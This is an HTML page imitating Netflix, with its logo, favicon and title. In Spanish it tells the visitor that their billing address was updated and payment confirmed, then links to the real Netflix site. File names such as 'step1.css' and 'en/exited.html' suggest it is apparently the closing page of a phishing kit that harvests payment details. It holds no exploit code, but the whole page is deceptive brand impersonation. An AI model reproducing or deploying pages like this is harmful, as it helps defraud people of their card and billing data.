
<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="step1.css">
  <link rel="shortcut icon" href="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.ico"/>
  <title>Netflix</title>
  </head>
  <body>
    <div class="header">
      <svg viewBox="0 0 111 30" class="svg-icon svg-icon-netflix-logo" focusable="true"><title></title><g id="netflix-logo"><path d="M105.062 14.28L111 30c-1.75-.25-3.499-.563-5.28-.845l-3.345-8.686-3.437 7.969c-1.687-.282-3.344-.376-5.031-.595l6.031-13.75L94.468 0h5.063l3.062 7.874L105.875 0h5.124l-5.937 14.28zM90.47 0h-4.594v27.25c1.5.094 3.062.156 4.594.343V0zm-8.563 26.937c-4.187-.281-8.375-.53-12.656-.625V0h4.687v21.875c2.688.062 5.375.28 7.969.405v4.657zM64.25 10.657v4.687h-6.406V26H53.22V0h13.125v4.687h-8.5v5.97h6.406zm-18.906-5.97V26.25c-1.563 0-3.156 0-4.688.062V4.687h-4.844V0h14.406v4.687h-4.874zM30.75 15.593c-2.062 0-4.5 0-6.25.095v6.968c2.75-.188 5.5-.406 8.281-.5v4.5l-12.968 1.032V0H32.78v4.687H24.5V11c1.813 0 4.594-.094 6.25-.094v4.688zM4.78 12.968v16.375C3.094 29.531 1.593 29.75 0 30V0h4.469l6.093 17.032V0h4.688v28.062c-1.656.282-3.344.376-5.125.625L4.78 12.968z" id="Fill-14"></path></g></svg>
      <div  onclick="window.location = 'index.html'">
        DESCONECTAR
      </div>
    </div>
    <div class="minbody">
        <div class="pana">
          <div class="shield"></div>
          <h1>Estás listo!</h1>
          <p>Dirección de facturación actualizada.</p>
          <p>Forma de pago confirmada.</p>
        
        <a href="https://www.netflix.com/mx/">REGISTRARSE</a>
        </div>
      </div>
      <div class="botonfachero">
            <style>
              .botonfachero {
                display: flex;
                justify-content: center;
                align-items: center;
                margin-top: 10px;
                padding: 10px;
                width: 100px;
                border-radius: 5px; 
                border: 1px solid #000;
                background-color: transparent;
              }
              .botonfachero a {
                text-decoration: none;
                color: #000;

              }
            </style>
            <a href="en/exited.html">Ingles</a>
          </div>
      <style>
        .header {
  width : 100%;
  border-bottom : 1px solid #e6e6e6;
  height : 90px;
}
.header svg {
  height : 45px;
  width : 167px;
  vertical-align : middle;
  text-decoration : none;
  fill : #e50914;
  display : inline-block;
  line-height : 90px;
  margin-left : 3%;
  margin-top : 23px;
  cursor : pointer;
}
.header div {
  float : right;
  margin-right : 3%;
  color : #333;
  font-size : 19px;
  margin-top : 35px;
  font-weight : 700;
  cursor : pointer;
}
.header div:hover {
  text-decoration : underline;
}

.minbody {
  padding-top: 100px;
  text-align: center;
  display: flex;
  justify-content: center;
  align-items: center;
}
.minbody h1{
  color: red;
}
.minbody p {
  padding-bottom: 10px;
}
.minbody a{
  margin-top: 30px;
  width: 100%;
  padding-left: 30px;
  padding-right: 30px;
  text-decoration: none;
  padding-top: 10px;
  padding-bottom: 10px;
  border: none;
  background-color: red;
  color: #fff;
}
      </style>
</body>
</html>